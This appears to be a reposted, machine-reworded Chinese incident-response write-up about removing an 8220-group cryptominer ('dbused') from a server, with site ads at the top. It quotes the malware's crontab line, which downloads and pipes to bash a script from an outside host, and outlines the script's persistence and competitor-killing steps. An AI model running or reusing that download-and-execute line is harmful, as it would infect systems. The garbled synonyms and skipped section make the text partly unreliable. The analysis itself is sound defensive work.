挖矿木马：一场较量

币圈常见问题 10个月前币百度站长

61,455 0 4292

WB3交流加微信：WX-93588，⬅️此处为全站广告位，与正文项目无关
注册并登录App即可领取高达 60,000 元的数字货币盲盒：点击此处注册OKX

0x00概述

本文主要是记录了一次针对挖矿程序的应急响应处理，从三个部分来解读此次事情：

事情描述部分，承认是否有挖矿程序。

现场剖析部分，讲了是怎么一步一步杀掉挖矿程序。

程序剖析部分，针对挖矿脚本的详细解读。杀死竞赛挖矿程序、进程看护、传达挖矿。

0x01疑问的用户

前几天接到客户反映，他们有一台服务器资产存在异常现象，本来装备的crontab守时使命全被修正，用户8220miner组织、miner木马病毒、xms、沦陷下载的标签。

与客户承认该守时使命是可疑的之后，又用top检查了系统资源，发现了一个程序名称为“dbused”的可疑进程，长期的cpu资源占用达到了100以上。

利用可疑的进程PID，从/proc/[PID]目录下的exe文件定位到源文件来自于/tmp目录下的dbused。

将可疑文件扔到VT进行检测，发现极可能与“CoinMiner”挖矿木马相关。

看来这次进犯八九不离十便是挖矿木马相关的进犯了，守时程序应该便是用来下载挖矿程序的，只要先把守时程序删去，再删去歹意程序就行了，所以一一删去之，应该就能够交代了。

主意很夸姣，现实却很残暴。几秒后，发现歹意进程和守时使命悉数恢复了，一朝回到解放前，看来是把问题想得太简单了。

0x03研究员的反击

研究员开始痛定思痛，其实在第一次剖析的时候还忽略了几个关键的头绪：

用户反映crontab会被自动改写（说明存在保持进程）

未检查系统可疑进程

未剖析下载的内容

所以乎，ps-ef检查系统进程，发现存在五个以上的歹意下载进程，和之前发现的守时使命一模一样，确实存在多个保持进程。

curl-fsSLhttp://a.oracleservice.top/xms||wget-q-O-http://a.oracleservice.top/xms||python-c”importurllib2asfbi;printfbi.urlopen(“http://a.oracleservice.top/xms”).read”)|bash-sh;lwp-downloadhttp://a.oracleservice.top/xms/xms;bash/xms;/xms;rm-rf/xms

突破口都指向下载的可疑文件，下载进行剖析，剖析发现是一个结合资源准备、同类竞赛、进程保持、横向扩散、痕迹铲除的脚本。

Step1：最大化这个进程的使用资源

1.脚本先将系统的selinux防火墙设置为封闭。

2.脚本将用户最大可用的进程数调整到5万，便于最大化占用主机资源。

3.修正内存参数，意图也是最大化占用主机资源。

Step2：删去竞赛进程

这儿意图是为了封闭一些进程，这儿的封闭进程的行为，意图是为了杀掉其他的一些挖矿进程，只允许自己的程序挖矿。

检查列出杀死的连接IP情报，基本都是与挖矿或木马相关。

Step3：删去文件的特别属性使得文件能够被修正操作

chattr指令mod解释

i：即Immutable，系统不允许对这个文件进行任何的修正。假如目录具有这个属性，那么任何的进程只能修正目录之下的文件，不允许树立和删去文件。

a:即AppendOnly，系统只允许在这个文件之后追加数据，不允许任何进程掩盖或截断这个文件。假如目录具有这个属性，系统将只允许在这个目录下树立和修正文件，而不允许删去任何文件。